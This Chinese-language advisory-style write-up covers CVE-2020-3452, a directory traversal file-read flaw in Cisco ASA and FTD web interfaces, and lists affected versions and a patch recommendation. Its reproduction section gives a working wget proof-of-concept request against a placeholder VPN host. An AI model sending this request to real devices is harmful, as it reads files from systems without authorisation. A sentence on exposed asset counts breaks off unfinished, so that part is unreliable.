0x01 漏洞描述
Cisco官方 發布了 Cisco ASA 軟件和 FTD 軟件的 Web 接口存在目錄遍歷導致任意文件讀取 的風險通告,該漏洞編號為 CVE-2020-3452。
漏洞等級:中危。
通過shadon引擎的搜索,目前全球大約有210,685個資產為
該漏洞目前僅影響啟用了AnyConnect或WebVPN配置的設備,並且此漏洞不能用於訪問ASA或FTD系統文件或底層操作系統(OS)文件。
0x02 影響版本
- Cisco ASA:<= 9.6
- Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
- Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
0x03 漏洞原理
Cisco Adaptive Security Appliance (ASA) 和 Cisco Firepower Threat Defense (FTD) 的 web 服務接口存在漏洞,允許未經身份驗證的遠程攻擊者向受影響的設備發送一個精心制作的HTTP請求,成功利用該漏洞的攻擊者能夠進行目錄遍歷攻擊並讀取目標系統上的敏感文件。
0x04 漏洞復現
漏洞主要是可以通過接口構造特定請求來實現攻擊。
漏洞的驗證方式是可以讀取相關的文件來驗證,如:
wget https://vpn.target.local:443/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
這里構造了數據包進行驗證。
0x05 漏洞修復
安裝
Cisco ASA/TFD 最新補丁,進行補丁升級。
參考鏈接
